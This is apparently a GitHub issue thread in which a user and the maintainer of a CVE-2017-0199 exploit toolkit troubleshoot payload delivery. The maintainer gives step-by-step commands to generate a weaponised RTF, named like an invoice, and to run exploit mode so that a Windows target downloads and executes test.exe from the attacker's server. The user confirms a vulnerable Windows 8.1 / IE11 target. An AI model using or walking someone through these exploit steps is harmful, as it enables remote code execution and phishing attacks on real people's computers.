Request for help please #58
I think you forgot to specify the port in the -e argument; it should be something like http://192.168.1.100:443/test.exe because the tool is running on 443 and not on 80.
On 6 Dec 2017 1:48 p.m., "ITLerner" <notifications@github.com> wrote:
I am using kali linux2. I generated an RTF file using the command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443
Then I used the command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe to run exploitation mode. When I run test.rtf on a Windows machine I get "Received GET method from 192.168.1.108" twice. The issue is that test.exe is NOT being delivered to the Windows machine. Please help me. Thanks
Dear bhdresh, I am extremely thankful for your reply. I changed the -e argument as you mentioned. I still have the same issue: I receive "Received GET method from 192.168.1.108" twice (in two lines). I am confused about HTA. I think the HTA should deliver the payload, but in my case I haven't added this. Please help me with how I can add the HTA.
I see, let's start with a basic setup then.
Step 1) Generate the RTF using the command below:
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.1.100/logo.doc
Step 2) Copy test.exe into /tmp
Step 3) Start the toolkit in exploit mode using the following command:
python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.1.100/test.exe -l /tmp/test.exe
Step 4) Open the RTF file on the target.
Note: it was pointed out in the Metasploit thread that the Internet Explorer version should be at least IE10 (rapid7/metasploit-framework#8220).
Hope this will help :)
On 6 Dec 2017 8:26 p.m., "ITLerner" <notifications@github.com> wrote:
Dear bhdresh, I am extremely thankful for your reply. I changed the -e argument as you mentioned. I still have the same issue: I receive "Received GET method from 192.168.1.108" twice (in two lines). I am confused about HTA. I think the HTA should deliver the payload, but in my case I haven't added this. Please help me with how I can add the HTA.
Thanks again for your time and reply. I did the same as you mentioned. This time I didn't see anything when I started the toolkit in exploit mode, not even "Received GET method from...". I am unable to understand what logo.doc is in the -u argument?
Are you sure the target is vulnerable and the IE version is 10+? Regarding your query about the arguments, the image below from README.md should help you understand the flow and the role of the arguments being used: https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg Thanks.
Yes, I am 100% sure. I am testing it on Windows 8.1, IE 11. When I use the -u argument without logo.doc (mentioned at the end of the command), I receive "Received GET method from...", which indicates system vulnerability, but my payload is not being delivered. If I use the -u argument with logo.doc, then I don't receive any response. Please explain what logo.doc is. I hope you will understand my point and help me. Regards
What is logo.doc? Can this be used on a remote server, or just local?
I am using kali linux2. I generated an RTF file using the command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443
Then I used the command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe to run exploitation mode. When I run test.rtf on a Windows machine I get "Received GET method from 192.168.1.108" twice. The issue is that test.exe is NOT being delivered to the Windows machine. Please help me. Thanks